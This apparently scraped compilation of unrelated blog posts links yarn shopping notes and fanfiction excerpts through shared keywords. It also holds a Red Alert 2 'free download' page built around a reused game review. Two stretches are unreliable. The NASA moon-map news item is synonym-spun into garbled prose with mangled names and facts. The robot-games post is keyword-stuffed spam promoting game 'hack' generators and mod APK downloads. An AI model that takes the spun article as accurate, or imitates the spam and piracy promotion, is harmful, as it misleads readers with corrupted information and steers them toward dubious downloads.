#yarn reconnaissance
ub-sessed · 2 years
A few chainette yarns I saw at Fabricville:
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▪️Lion Brand 24/7 Cotton, worsted cotton chainette. Really looks like a DK to me, but I've never used chainette, so what do I know? Pretty soft for 100% cotton, very light. I'd like to try it. I wonder if it has more give than a plied cotton yarn like Patons Grace.
▪️As far as I can tell, Bernat Bundle Up and Lion Brand Feels Like Butta are identical: worsted polyester chainette. The Bernat might be the teeniest bit fuzzier, and calls for a 5mm needle instead of 4.5mm. Both are very soft, ridiculously light, look like DKs, and come in super boring colours. The Bernat put up is bigger. ETA: According to Ravelry, the Bundle Up is a worsted and Feels Like Butta is an aran. Might be nice to make a little cap to wear around the house to keep my shaved head warm.
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cherr-22 · 11 months
The study was filled with people even before the sun rose.
The Kyle who once kissed me ten times a day only kissed me thrice. He worked busily as if he had forgotten about my existence.
On one side, it’s a good thing. I don’t have to deal with his otaku-ness.
“Move that item to this side. The clothes too.”
“Yes, Your Highness.”
“Good. And the report?”
“It has been sorted out, Your Highness.”
“Well done. Then call that person over here.”
“Are you talking about the demonic beast specialist? I am not sure if he is in his room right now…… as Your Highness has mentioned before, it seems the time he is out is longer than the time he stays in the room.”
Kyle drew a faint smile.
“Still, we promised to go together. He must be waiting.”
“I understand, Your Highness. I will call him over quickly. Then Your Highness…….”
“I will be going over the reports on the demonic beasts for a moment.”
With that, he came over briefly to give a pat on my head and began to read over the reports.
Since it was a crucial matter, Kyle’s expression became serious. Even the smallest detail could determine life or death.
I contemplated to whether I should use the replica hamster, but decided that a ‘Summon’ would be enough after seeing Kyle focusing hard on his duties.
‘Current Miracle Points are roughly 26 percent…….’
No matter how fast we return, it could take up to half a day.
Who knows how many acorn cookies I would have to eat. Do you not do bulk sales? Well, okay then…… I’ll think about it when the time comes. Worst comes worst, I’ll pretend to return early.
I used ‘Summon’.
[I wish you good luck! (ෆ`꒳´ෆ)]
I wore my now familiar clothes and pretended as if I have been waiting in the room for a while. The soldiers then came and guided me back to the study.
Until the moment I entered the study, Kyle was busy reading. Seeing him like this made him look very diligent and tenacious.
“The Northern winds are harsh.”
He gestured at a box on the table.
“Wear this now. We will depart immediately.”
I looked inside the box.
There were sturdy leather boots, a hooded long coat, and light-weighted bow and arrows.
“The bow and arrows will not be necessary for this reconnaissance, but it is good to get used to having them equipped.”
For him to say that, it must be extremely uncomfortable to carry around.
I suppressed my urge to talk back. What could I do anyway? If I wanted to find one that was comfortable, I would’ve just stayed quietly in the castle.
“I’ve also prepared something.”
I was trying to figure out when to give it to him for a while, so this would be a good time.
I pretended to carefully take out my coat pocket and called the store.
[Love Love Corner~❤]
I will never get used to that name ‘Whatever Corner’.
‘Anyways, let’s see. The hamster items…….’
[Fluffy hamster yarn! | ❤×10]
[Small and precious knitting needle set | ❤×10]
[Try making one yourself! 79 styles of hamster clothes | ❤×20]
Hey, hey! Hey!
What’s with the prices! They all have an extra ‘0’ than before! Isn’t this a scam?
If someone were to see us, they would think I’m the one scamming you with your expression like that. This is absurd.
‘Still, I can buy it since I have plenty of Hearts compared to Miracle Points…….’
From now on, I should buy items beforehand while they are cheap. To betray a person like this. I don’t have a choice so I should accept it at the moment.
[Currently Possessing Hearts | ❤×185]
New items arrived in the Love Love Corner.
[Demonic Beast Encyclopedia | ❤×200]
This is exactly what I want!
I cried of joy inside.
‘I wonder if the system requires the Hearts and Miracle Points to constantly update the store.’
If that’s the case, I could look over the increase in price from earlier. That is, if they release useful items like this.
However, there’s a problem…….
[Currently Possessing Hearts | ❤×185]
……Not enough Hearts.
I probably could’ve bought it if I hadn’t been ripped off.
I resisted the urge to curse out loud.
“What’s wrong?”
The image of Kyle reading <Try making one yourself! 79 styles of hamster clothes> as seriously as the report from before appeared before me.
“Well…… umm, so. Do you like my present?”
“I don’t know if it’ll like wearing these clothes, but they are definitely cute.”
He flipped to a page and showed it to me. It was a picture of a pink cape with a strawberry-shaped embroidery.
Bastard. You think it’d like that? The hamster would punch you if it could. And how do I know that? I know that because I’m that hamster.
Of all 79 clothes, you just had to pick that one? How about the others? Don’t tell me all the other 78 clothes are also like that.
That stupid strawberry. In all twenty-seven years of my life, I never worn such a ridiculous print. I wouldn’t even wear it by accident.
“……I-I’m sure it’ll like it. Is that pattern to your taste?”
“Well. Just imagining Cashew wearing it makes me happy.”
Kyle’s expression grew a little brighter..
I quickly checked the amount of Hearts I have.
[Currently Possessing Hearts | ❤×186]
I already knew it vaguely, but it was now clear.
A Heart was given when Kyle Jane Meinhardt became happy. And with that, I could buy something that might be helpful or that would help avoid a crisis.
For example, the <Demonic Beast Encyclopedia>.
That book will clearly contain the characteristics, hunting habits, weaknesses, and other information on the demonic beasts in the North. That must’ve been why it was added to the store just recently, right before the reconnaissance.
As if to confirm my thoughts, the system window quietly floated up.
[Please replace bad moments with happy moments, and overcome dangerous situations!]
[Happiness is said to be another name for miracles. (๑˘ꇴ˘๑)]
Alright, I understand. I’ll do my best.
I showcased to Kyle how to use the small crochet hook.
During a volunteer work in the past, I learned to crochet wash scrubs. At the time, I thought it was one of the most useless thing to learn but now I’m using it here. As expected, who knows how life would turn up in the future.
“I’ll teach you more in detail next time…… this is basically how you do it. Your Highness is new to this, so I prepared everything carefully just for you.”
“Since we have to go now, take a quick look and come back to it later. Rather than that strawberry thing, let’s start with simple clothes and try various other designs. Like sweaters and pants.”
“I worry it might not feel comfortable wearing clothes.”
I can put up with it once or twice.
“It should be fine if you don’t try to force it to wear them.”
He went silent momentarily. It seemed to be that he was imagining something in his head.
[Currently Possessing Hearts | ❤×195]
Aren’t you imagining things a little too hard? Just what exactly is going on in your mind right now?……No, never mind. Let’s not be curious about that. Sometimes ignorance is bliss.
“Though I suppose it will be quiet for a while?”
I walked down the stairs, matching his pace. Kyle nodded, realizing I was talking about Belial.
“That’s right. There hasn’t been any big news so it should be quiet for at most a year, at least three months.
“You talk about it as if it’s some kind of annual event.”
“Well, it’s not any different.”
Kyle wrapped his arms around my shoulders to prevent me from being pushed around by the other knights.
It was comfortable to be honest. It felt like I was had some kind of special privilege. That being said, it didn’t make me feel happy in particular since I would have to return this favor eventually. Whether it would be a miracle, or happiness, by any means.
“He does not like me. His hate is similar to how I resent his bloodline. However, it didn’t feel as if he would try to get rid of me.”
He would be happy to put Kyle under his feet, but he wouldn’t try to kill him.
The reason was obvious. I bit my lower lips out of annoyance.
“He doesn’t want to manage the North. Well, not that he would be doing it directly with his own hands anyway.”
“That’s right.”
So, he would be keeping Kyle alive as a guard? I can’t deny it does look like that right now.
“Come this way.”
Kyle picked me up and put me on top of a black horse. It felt a little uncomfortable seeing that the current horse was taller than the one I rode yesterday.
I held the reigns awkwardly and looked down at Kyle. Seeing his face from above made him look slightly different than usual.
He mounted the horse in a familiar manner and also held the reigns from behind me. When his chest touched my back, I felt strangely stable.
“Lean on me.”
Kyle spoke bluntly. I naturally leaned on him as he placed both arms around from my back.
To be honest, it felt a little cozy. Our body size wasn’t too different and his solid chest was quite comfortable to lean on.
“You don’t seem to be nervous at all.”
“If we stay here talking, we’d only waste time and energy.”
“You’re right.”
Kyle took the lead and moved forward with the knights lined up behind him. Clip-clop. As the dust rose and the horses started to walk in unison, I felt the ground underneath shaking.
“About Cashew.”
I hesitantly opened my mouth.
To be honest, I’m not confident that I could make someone happy. Even trying to be happy myself was a struggle, how hard would it be to take care of others?
“Why do you like it so much? It’s just a small demonic beast. Nobody thought you’d even take it in as a pet. You brought in magicians, veterinarians, and me too… it’s as if you cherish it a lot and I find that curious. I thought demonic beasts were to be slain or conquered at all costs in the North.”
I don’t know how to make you happy, but I want to listen to you and understand you.
“The people of Blake took over to reside in the North, but at the same time they coexist with the North. Humans are beings who conquer nature, but at the same time they are beings who belong to nature. Destruction is not the only thing they do.”
“Demonic beasts are a dangerous existence. One careless mistake and it could instantly snuff out a person’s life and trample on the foundation you built over the years. Cashew is no exception. If I deem that it will become dangerous to keep as a pet, it will be disposed of.”
Please don’t do that. There’s a person inside.
“However, I cannot kill it for a reason that has not yet happened yet.”
So I…… no, Cashew could’ve died?
“It was separated from its group, shaking helplessly and unable to even open its eyes. If I hadn’t picked it up then and there, it wouldn’t even have lasted an hour.”
“Did you pity it?”
“Yes. Is that strange?”
“No, well…….”
Is there anything to think strange about it? That was his choice and in the end, it was a good choice. Who would’ve thought that the ruler of the North would have such a humane side to him.
“I just want to say thank you.”
Kyle looked at me for a short moment in silence. It was a strange look, but also a look of happiness.
“Would Cashew think that way too?”
“Of course.”
“How could you be so sure?”
“Since…… I’m a demonic beast specialist?”
And your one and only pet hamster.
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aitchnkay · 1 year
Jiang Gunian Made A Change Part 15
Jiang YanLi strode past the Jiang encampment, idly noticing that her disciples were practicing diligently. And that the fortune teller, Xia KeXin, was sitting in... something. A chair? But with curved slats on the bottom? And she had a bowl of yarn and was using some sort of metal stick to weave the yarn into something. Odd woman.
However, YunmengJiang disciples weren't her destication. Walking into the Nie section, she spied her goal: Meng Yao. "Please take a walk with me, Meng Gongzi," she entreated.
"How can I be of use?"
"I know all about you. I know who your parents are." His face darkened. "I know what kind of people they are. Or were. I know how intelligent you are. What I don't know is if you can be an asset to this rebellion or a liability. I would prefer you as an asset to be retained rather than a liability to be discarded."
He stopped walking, facial emotions smoothing out to blankness. "I'm not sure what Jiang Guniang means. I am a loyal servant to Nie ZongZhu, his brother, and the sect."
"Servant?" Jiang YanLi tipped her head sideways in thought. "Perhaps. Loyal? I am well aware of where your loyalties lay. Speaking of which... how many are on your kill list, and how many are here?"
"Kill list? I do not have a kill list, Jiang Guniang."
"Don't play stupid," she admonished. "I know you have a list of people who insult you because of your mother's profession. I know you fully intend to remove them, permanently. I need to know how many of them are here."
"Because we are going to war. I need every able bodied fighter I can get. I don't need you taking advantage of a situation and taking out any of them before the battles begin. If you need them dead, it's much easier for me to send them to the front lines once the war starts. So." She looked straight at her potential adversary. "How many. And who."
"Why would you do that for me?" He sounded genuinely confused.
"I have been elected leader of this camp. I can do some of the work. But strategy? That's not one of my strengths. It is one of yours. You can think of moves and countermoves and plot out the shape of the war, change plans as new information comes in. I need that. But if I have to execute you for murdering the men who call you a bastard, I lose that expertise. I have no desire to lose an asset to idiocy. So. Answer me."
He seemed to think, then nodded. "I have fourteen men on my kill list. Three are here. That one, black ribbon, bronze guan, the one with blueish gauntlets next to him. White ribbon, overly gaudy sheath, laughing like a donkey."
Jiang YanLi looked at each of the men indicated, trying to memorize their faces. "Just those three?"
"For now." He seemed amused.
"Meng Yao... Obviously I've never met your mother, but I do know what kind of woman she had to be. A woman who would use her meager earnings to educate you in hopes that you would be accepted by your whore mongering father? I wish I could have met her. She seems like a woman worth knowing."
"She was a prostitute."
"Do you know why there are prostitutes?" He just looked at her blankly. "It's because there are men who refuse to not use them. If all men would stay celibate except within the bonds of marriage, there would be no need for women to sell their bodies. I would hazard a guess that the men on your kill list have gone to pleasure houses and availed themselves of the services there.
"Your father is more to be despised than you. He used your mother and refused to accept responsibility for the consequences." She laughed lightly. "Wouldn't it be poetic if you were to lead the rescue party that saves him?"
"I think I would like that."
"Do we have a deal then? You become my strategy advisor and I will handle those on your kill list."
"Excellent. Now, as my advisor, please tell me how you communicate with Nie ZongZhu." He looked blankly at her. "Wei WuXian and Lan WangJi are leaving on a reconnaissance mission. You have a way to communicate. I need to know if it is something they can use to communicate with me."
Meng Yao looked around at the Nie soldiers drilling or relaxing. "I have a set of boxes. The boxes are paired. What is placed in one is teleported to the other. They're small, about the size of a box for rouge. The spiritual energy required to operate them is almost negligible."
"And you have been in contact with Nie ZongZhu all this time?"
"May I have a pair?"
"Of course." He bowed.
"Thank you, Meng Gongzi," she bowed in return. "I look forward to our new partnership."
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icterid-rubus · 3 years
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Ya’ll what??? I won a shop prize from a store during the yarn crawl and I expected some pins and knitting accessories. This is insane!!! I feel like I just robbed the shop. And so much of this is stuff I already wanted or patterns I’d saved in my favorites. Did they go on a reconnaissance mission before putting this all together??
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Continued from [[X]] @dragonsdance​
Truth be told, he hadn’t been thinking at all that he would have gotten anything back from her. He had been more than satisfied simply knowing that she was thoroughly enjoying the company of her new friend!
If anything, It had been fun in it’s own way to spend the time necessary to track down just the right kind of rabbit for her, one that resembled the Chappy dolls he had seen and heard so much about. So at first he was a bit surprised, but that disbelief turned to happiness as he began to tear through the wrapping paper.
The moment his eyes settled on the small doll he couldn’t help but smile, and perhaps chuckle at little bit to himself. It was cute, of that there was no doubt and he definitely had to give her credit where credit was due.
She had worked hard on this and it certainly showed as she had captured ever detail about his titular fighter’s Gi. She had even gone as far as to create and stitch in small, yarn ball likes copies of each of the seven dragon balls in his hands too! And his hair too! Now that was attention to detail!
Giving it a little squeeze without knowing of the extra features it came with he laughed as he heard the small recording of his signature moved play back to him. His hands gently squeezing the small doll a few times over just to hear it mimic his technique over and over. He was certain if Vegeta had this, he would be squeezing it for other reasons.
His motions soon stopping however, tail curiously flicking to the side as he followed her instructions and turned his attention towards the bottom of the miniature version of himself.
Ebony pupils widening, becoming almost as big as the pork dumpling and sushi rolls that he would be gazing over with this ticket in hand. She had certainly heard from the right people! His stomach in clear agreement as he was tempted to take off to head straight towards the buffet right away!
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“ Thanks! Wanna come with me? I’m sure there’ll be enough for the two of us. Whadda ya say? “
Violet eyes watched Goku’s expression carefully, unable to hide the pleased smirk painted across her face. It had been difficult to figure out what to get him. It was strange the way this friendship between them had developed. It had taken a bit of reconnaissance on her part to discover his signature attack name but not very long to know that food is what Goku loved. She had debated cooking him food but the quantity of food she’d seen him eat before quickly killed that idea. 
Though trying to keep out of his senses while observing had been difficult. She’d had to suppress her own reiatsu to keep him from sensing her and moved very discreetly. From her observations, she’d learned more about the other than just his preference for food. He had a myriad of friends and genuinely cared for others. All of this seemed to prove her initial judgement of the Saiyan as a kindhearted soul.
Rukia laughed out loud at as his tail swayed and stomach growled in response. “I was hopeful you would like it!” She tilted her head slightly and contemplated his invitation. It was near dinner time and it had been a while since she’d eaten. 
“Yes, I think I’d like to go with you. Although I’m not sure there is such a thing as enough food for you.” Her voice was light and teasing. It was becoming more natural to  “I can’t believe how much energy you burn. It’s unlike anything I’ve ever seen before.” 
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ladylynse · 5 years
Saw a post about Gregor/Elliot in the DP tag and thought, huh. Elliot/Gregor+Lila, a match made in heaven (or more accurately, hell). Whether you take this as romantic, rivals, or partners in crime, can you do "two liars in a lying pea pod" (lol I know it doesn't make sense but it's the first thing that came to mind)? Your choice whether all of Team Phantom and/or Marinette+Adrien are involved (or heck, SQ!) or if it's from Elliot or Lila's POV (in an "outsider" POV style? Might be fun)
Okay, I went SQ, but not outsider POV because an outsider wouldn’t necessarily know Lila and Elliot were lying unless they were really good at reading people or just happened to know that whatever was being talked about was a lie. You’ll get Marinette’s outsider POV on the SQ (or at least Danny) instead.
“Look at them,” Marinette muttered, “going around, thick as thieves, spinning yarns with their silver tongues, like two liars in a lying pea pod.”
Chat Noir’s friend Phantom had come ahead to do reconnaissance with her—as much because he’d dealt with Lila’s new friend in the past as because Chat Noir claimed he was really useful on a recon mission, for all that she had yet to see his so-called skills—and he shot her a confused look and asked, “Does that count as mixing your metaphors?”
She rolled her eyes and got up to move ahead, but he suddenly grabbed her arm, and she realized that Chat Noir’s brief description of his powers—‘anything a ghost can do,’ which she’d thought unhelpful at the time—was incredibly accurate; though Lila and Elliot had changed course and were now walking towards them, still deep in conversation, they didn’t give any indication that they could see her or Phantom.
see more fics | crossovers | have me write a longer ficlet | vaguely related
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importantlovecolor · 4 years
Red Alert 2 Installer Free Download
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Download Red Alert 2 Free
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With the same multiplayer capabilities as Red Alert 2, all that Yuri's Revenge does for you is to add a third combatant, Yuri's Forces, and a few extra units for the Allies and the Soviets. Graphics Always an unfortunate element of Westwood's Command & Conquer games, the graphics in Red Alert 2 are very similar. Command & Conquer Red Alert 2: The real-time strategy classic - for free!
Red Alert 2 Game Installer, free red alert 2 game installer software downloads. I want to know if there's a Red Alert 2 Installer that is free even this website it does have it but it just download there Yuri Revenge one but it still ask me to get Red Alert 2 The Red Alert 2 & Yuri's Revenge downloads from our site are both the same. There is an RA2 mode you can enable in the CnCNet client. Download Command and Conquer Red Alert 2 + Yuri’s Revenge Free, In Command and Conquer: Yuri’s Revenge, the story starts off assuming that the Allies were victorious in Red Alert 2. The game begins with the White House announcing DEFCON 2 status, as Yuri, the former head of the Soviet Psychic Corps, plans to take over of the world through.
Considering all the delays, hype and disappointment that surrounded last year's release of Command & Conquer sequel TiberianSun, Red Alert 2 has, in comparison, had a rather quiet time of it. Its announcement in May took many by surprise (including us) and now it seems barely has the marketing machine had time to get into first gear than the game has been finished, packaged and readied for release.
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Consequently, thanks in no small part to the worldwide panning of Tiberian Sun, expectation for Westwood's new real-time strategy game has been only marginally higher than that we would reserve for a decent English summer. To its credit, developer Westwood has neither proclaimed Red Alert 2 be ground-breaking nor Earth-shattering and, after the tragic anti-climax that wasTiberian Sun, we wouldn't have believed them if they had.
Using an enhanced -unnoticeably so - version of the Tiberian Sun game engine and sporting many gameplay features and units from a four-year-old game, Red Alert 2 could be seen as a glorified remake of its predecessor. Westwood has done the same thing before, with Dune 2000 - the botched up remake of real-time strategy's most influential game - so it wouldn't be beneath them to do the same again.
Now before you all start sending me death threats for my cynical indifference, let me just say if I hadn't been so pessimistic before playing the game, I wouldn't have enjoyed it as much as I did.Think about it - and be honest - what are your expectations for the next Star Wars game? I'd wager not too high after having wasted your money on Force Commander. But because we are all Star Wars fans, or at least we should be, there is the hope that the next one will be brilliant. However, in Red Alert 2s case I wasn't hoping for much at all. You'd do well to think the same, for if you do, I guarantee you'll be pleasantly surprised.
Heroes And Villains
When you review a game - or at least when I do - one essential technique is to jot down pages of notes while you're playing, so when it comes to writing the review, you can refer back to them. Normally what is written down, though illegible, makes some sort of sense, but one of the last things I wrote was 'missions good. Nothing special. Addictive'. I am at a loss as to what I was on about, but I can tell you this: the missions in themselves are pretty undemanding, yet taken as a whole (and separated by a story that sees the USA being invaded) the two campaigns on offer (you can play as Allies or Soviets) are very engaging.
As is par for the course, you build a base, harvest ore, expand your borders and kill the unending trickle of enemy units until you overrun their base, all with scant regard for tactics - been there done that, we all have. With that in mind, what has been baffling me is why I enjoyed Red Alert 2 so much and yet could not derive any pleasure from Tiberian Sun. Both games are practically identical in structure, offering similar units to play with across a linear series of missions, liberally interspersed with high-quality video sequences. The only answer I can offer is a subtle difference in feel and mood. Where Tiberian Sun was a dark and faintly absurd yarn full of square-jawed heroes and boo-hiss villains, Red Alert anti its illustrious predecessor are somehow believable, despite being even more outlandish.
Graphically, Red Alert 2 is far from great. The animation for some of the larger units, ships especially, is juddery and the explosions are hardly spectacular. However, bearing bright colours and full of tiny details - like baseball and football pitches, fast food bars and houses - many levels are full of civilian life that have little impact on the game, but add a touch of fun to the proceedings. Sunbathers run half-naked on the beaches and cattle make themselves targets for your restless attack dogs on the farms. Elsewhere, across maps frozen with ice, all the buildings are draped with snow as if to fool us that they had been there forever. They haven't of course, but it's seemingly insignificant details like this that add a bit of colour to our interminably dull lives.
Animal Magic
Download Red Alert 2 Free
In regard to the two sides you can choose to play, both are as distinct as any you'll find in a real-time strategy game. One of Westwood's strengths is that it always offers two very different challenges in all its strategy games, by throwing in units and buildings that look and play to different styles. Many of the units are standard fare with infantry and tanks in abundance, but there are a number of clever differences between even those.
Soviet conscripts are both cheap and weak, American GIs are marginally more expensive and can be deployed in a defensive role, able to fortify themselves in an instant within a cocoon of sandbags.
The Allied Infantry Fighting Vehicle (IFV) is another interesting unit. Alone it is a weak reconnaissance tank, armed with a simple rocket launcher. But put a Gl inside and its turret becomes a powerful anti-personnel platform. With an engineer at the controls it alters into a mobile repair vehicle and there are other transformations that can be achieved by trying out other, more potent infantry units inside.Things like Rocket Launchers, Tech Yards and Gap Generators we've seen before, but many units, both old and new, can combine in interesting ways.
Place some Tesla Troopers with their electrifying weapons around a static Tesla Coil and they'll boost the power of it and keep it charged even when the power is down during an enemy attack.As in all RTS games, both sides' infantry units are easily overrun, even in large numbers, but this time around they can find shelter in many of the neutral buildings that pepper the levels. It's a feature that is long overdue in a Westwood game (Age Of Empires IIanti the soon-to-be-released WWII RTS Sudden Strike both offer the same option) and although not every building can be captured, certain ones that are can be a powerful complement to your base by creating chokepoints through which a lightly armed enemy can quickly perish.
Furthermore, there are four neutral Tech Buildings that can be procured - Airports, Hospitals, Outposts and Oil Derricks - all of which can support and replenish units that might otherwise have to make a long journey back to base.
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The Soviets are still the side of cheap mass-produced technology, underhand and willing to sacrifice numbers for victory. In contrast, the Allies rely on fast, high-tech units that are more adaptable, yet weaker if left in a sustained fight with Soviet units of similar role.
One aspect in which Red Alert always won out over CSC was its use of naval units. And once again, Red Alert 2 gives the Soviet side a greater underwater navy, while the Allied fleet is predominantly surface-based with Destroyers, Cruisers and Aircraft Carriers going against the Russian Typhoon Subs and Giant Squids.
Trained animals play a larger role in this sequel than they did in the original Red Alert. The Allies now have attack dogs, as do the Russians, and against the Squids the forces of good rely on herds (or pods if you want to be technical) of clicking dolphins and their sonar attack.
Bring Your Friends
Even though the storyline and the level-by-level feed of new technologies are enough to keep you entertained throughout the two campaigns - and there is always the option of the skirmish game - there comes a time when the war will be over against the computer and the time will come to take on a human opponent.
We won't even pretend that we have played Red Alert 2 online yet, no servers are running anyway, but we did play over a LAN and, thanks to the diversity in units and the immediate familiarity of all of Westwood's games, playing against a real opponent was tremendous fun. In multiplayer or skirmish games you not only have to pledge allegiance to the Allied or Soviet sides, you have to choose an army from a particular country, each of which have a particular special unit they can use: Germany has tank destroyers; Libya has demolition trucks; Cuba has terrorists; the US has paratroopers; and Britain has snipers. Not a deal-clincher, as Steve Hill would say, but fun all the same.
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As was the case in CSC, Red Alert, Ttberian Sun and now this,multiplayer games are all about throwing forces (onward to eat away at the opponent's defences. As you do so you are constantly thinking about what concoction of forces to send in next and while you leave your units to get on with it, you're cooking up another batch to send in. Westwood has never made strategy a priority in its games and here, too, the multiplayer game is about a slow pace of play that always ends up in spectacular fashion with entire bases wiped away by just one weapon. This - what we might term the railgun factor' -makes each game a race to build the most devastating weapon available rather than a plod through attack, counterattack and stalemate.
The Bit At The End
Red Alert 2 Installer Free Download Utorrent
About as ground-breaking as Windows 98 is to Windows 95, Red Alert 2 is no less essential for it. The interface has certainly improved since Tlberian Sun and the missions, varied and interesting, are carried along by a storyline that doesn't take itself nearly as seriously as other CSC games - for every cheesy line of dialogue, there's a knowing smile behind.
Remarkably well-rounded, the phrase 'more than the sum of its parts' could easily have been written with Red Alert 2 in mind. Unspectacular graphics, an AI that is clearly artificial and with little in the way of true innovation, Red Alert 2 is, nevertheless, an excellent game, well-designed and carried through with wit and style. In these times where realism is de rigueur, Red Alert 2 feels like a breath of fresh air.Just remember not to expect too much and you'll be as impressed as we were.
Back To The Future
Red Alert, the story so far...
In theory it's a good plan, but the greatest theorist of them all failed to realise the implications of his actions. After developing a timetravelling device in post-war America, Albert Einstein returns to 1923 to wipe Hitler from the history books. Unchecked by Nazi Germany, the Soviet Union, lead by Joseph 'Madboy' Stalin, embarks on a European crusade to turn our continent a nasty shade of red.
Defeated by an uncharacteristic display of unity, Stalin is killed by European Allied forces and Premier Romanov takes over Soviet control. Seemingly compliant and peaceful, he is of course quite mad and plotting his revenge against the Allies, he decides that America is ripe for invasion. Using mind control technology, the USSR sabotages America's nuclear capability and a huge invasion is launched into New Mexico, Texas and California. Which is where you come in to save the day.
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ub-sessed · 2 years
The Jean Coutu at the corner of Parc and Fairmount sells yarn! Do they always sell yarn or is this just a holiday thing?
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Madolaine Jouvencelle, super bulky chainette microfibre/merino. Not my jam.
Madolaine Socquette, light fingering wool/polyamide. Feels pretty scratchy (about the same as Patons Kroy), but the colours are nice.
Madolaine Marmaille, worsted acrylic. Nice and soft, but not in the slimy way that some soft acrylics are. Kind of nubbly. I like it.
They had a wooly looking bulky yarn too (Boréale, I think), but it didn't interest me.
They also have a website where they sell some brands that are relatively hard to find in Canada, like Cascade, Drops, Regia, and Universal. The website also sells Knitting Barber silicone cords, though they're not cheap!
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paulbenedictblog · 5 years
New Post has been published on %http://paulbenedictsgeneralstore.com%
Fox news NASA unveils 3D map of the moon
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Fox news
NASA has created a 3D scheme of the moon, the usage of CGI and files and imagery from its Lunar Reconnaissance Orbiter.
The CGI Moon equipment lets in 3D artists to comprise accessible files to the moon, which they won't otherwise get, after receiving a lot of requests, the home agency talked about.
“[The Moon kit] will enlighten the LRO files nearby of a whole bunch other artists who wish to discontinue the forms of things that I discontinue,” CGI Moon equipment and science visualizer NASA's Goddard Situation Flight Heart Ernie Wright talked about in a assertion.
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This animation illustrates how color and displacement maps are venerable in 3D animation instrument to paint and mannequin an object address the moon. (Credit: NASA/Goddard/Scientific Visualization Studio)
One in every of the predominant functions of the LRO, which has been studying Earth's pure satellite for the past decade, is to scheme its topography. This would reduction NASA as it prepares to reach to the moon in 2024 as segment of its Artemis program.
The LRO has an orbiter that scans the moon, constructing the listing one line at a time. It also has a laser altimeter, which makes spend of laser pulses to aid fabricate the listing of the moon.
Noah Petro, an LRO scientist at Goddard, talked about Wright's work is crucial, although folk don't model that he helps them.
“He can aid describe the narrative the usage of the LRO files, and illustrate complex-to-keep up a correspondence recommendations or ideas, of no matter the narrative will most likely be,” Petro talked about within the assertion. “So I mediate he’s already had some affect on how folk delight in the recommendations, when they don’t even understand it.”
Wright likened the usage of 3D animation instrument to filming reside motion, the usage of lights, cameras, props and items, adding "visualization is more address filming a documentary. You’re being honest, however you’re also rising a yarn.”
“We’re placing the pictures back into context, Wright persevered, asserting “we’re placing them back where they came from.”
The CGI Moon equipment would perchance merely additionally be accessed right here.
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gctschwifty-blog · 7 years
High Tech Armed force Educating With Animatronics.
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If robots are a practical choice to millions of 19 year old kids being killed or horrifically hurt, yes, send them in as well as let them get the job done, sadly they will just be combating those countries who are also poor to have robot militaries, however have lots of boys, which will be an embarassment, as our robots will certainly be eliminating their 19 years of age boys ... possibly a better idea would certainly be to place both sides political leaders right into a sealed unit and also allow those that come out to life be declared the victors, after that terminated. As an outcome of these achievements, a substantial number of brand-new features are coming to the video game, consisting of, brand-new squad systems, new motifs and colours for a number of robots, brand-new weapons as well as robotics are being checked for future launch. After a couple of matches though, brand-new players have a better understanding of exactly how the game functions and tactics to make use of in the different maps. Killing robotics with the trigger-happy hick Walter Tugnut readies old-fashioned enjoyable and also includes large weapons as well as tons of power ups. The Battle Robots hack could additionally assist you below because it will permit you to test out all the readily available builds as well as locate the one that fits you. Nahh daripada terus - terusan penasaran jadi langsung saja Download Arcane Online (MMORPG) Mod APK Terbaru for Android pada link di bawah artikel ini. Please Like, Share, Tweet or Google+ to access to the most up to date working variation of the Battle Robots hack and sustain the programmers. Below is one more sneak peek of the Battle Robots cheats in action, you could see exactly how the tool creates the requested resources. Shoot Several Robots is not really the type of video game that you must get complete cost. These clinical robots can either do microsurgery, or be made use of for an image guided biopsy. Daripada penasaran langsung saja Download Paradise Knights v1.0.1.2 Mod Apk pada link di bawah artikel ini. The section of the game I played introduced DBs, automated robot enforcers regulated by the GEAR federal government as a pacification pressure. War for Cybertron's project was fun, yet its multiplayer swiped the show - at the very least initially. All in all, this mobile title is best for players who enjoy robots as well as action. Robots have quietly become a component of our daily lives, whether seeing them in flicks, playing with them as toys, or creating uses for them which assist in much of the obstacles mankind faces. Ole UNITED STATE, needed to show world how hard we were, after all DOD was spending billions of billions, wherefore" Pols' pontificated, media spun, DOD-DC-oil all defeating war drums, pressing. On the whole, I might see with polish, albeit a great deal of gloss at this moment, this video game might replace WoT as my go-to game for when I wish to play a few quick multiplayer matches with a pal.
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Daripada penasaran langsung saja Download Rolling Yarn: Amazing Challenge v0.1.116 Mod Apk pada link di bawah artikel ini. Battle Robots merupakan game dari Pixonic yang hadir di perangkat Android dari tahun kemarin. War has its own dynamic or - if sounds also anthropomorphic - its very own grim formulas to exercise. Armed forces robotics are a modern technology that will certainly help make our efforts much more exact as well as improve control over our goals. When you require thousands to get all the best tools as well as robots, all the ideas War Robots hilesi as well as methods that you'll find will only obtain you a pair of gold bars. The very first armed robotic was released in Iraq in 2007 as well as it is as dangerous as its acronym is long: Special Defense Observation Remote Reconnaissance Direct Activity System (SWORDS). Download and install Fantasy Heroes Mod Apk Terbaru - Fantasia Heroes Mod merupakan video game RPG khusus buat ponsel Android dan Tablet computer yang dirilis oleh developper LYTO MOBI ini memiliki tampilan grafis 3D yang bagus serta dilengkapi dengan beberapa fitur keren yakni Endless Money yang dapat membantu saat kamu kesulitan dalam memainkan Video game Fantasia Heroes Mod ini. So I do not indicate robots will not deal with each others one day, but do not expect to make the battle like a computer game, it will just be a preliminar before u shed some of those u love: being killed by a maker or a human leads to the exact same path.
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datte-ba · 7 years
and we’re all together again | naruto
sum: the disbelieving laughter on her lips makes no sound, but it exists: in the part and the smile and the gleeful curve. [post-canon.] a/n: this was my submission for the @naruhinafanzine, i hope you all enjoy !
There is something truly marvelous about how in love with a person one can be in spite of what stands before them. Hinata knows this, because although her husband stands before her looking a total mess—hair uncut and unkempt, lavender stamped under his eyes, robe drooping off of his shoulders—there is something about the ramen takeout and handcrafted card and gift bag in his hands that makes her heart swell to an unfathomable degree.
It is three in the morning on a work night, and their tenth wedding anniversary is today, and Naruto Uzumaki remembers.
“Hey,” he breathes. He stands at one end of the kitchen, feet straddling the threshold that spills into the living room. Hinata holds one hand to her mouth in an attempt to hide a growing smile and uses the other to turn the spoon in her pot of soup.
“Hi,” she answers, amazed at how much effort it takes to utter the one word.
Naruto almost scowls at the vague reply, but he quickly replaces the frown with a wry smile. “You thought I forgot, didn’t you?” he asks, and he drops the contents in his hands onto the counter before circling around to meet her at the stovetop.
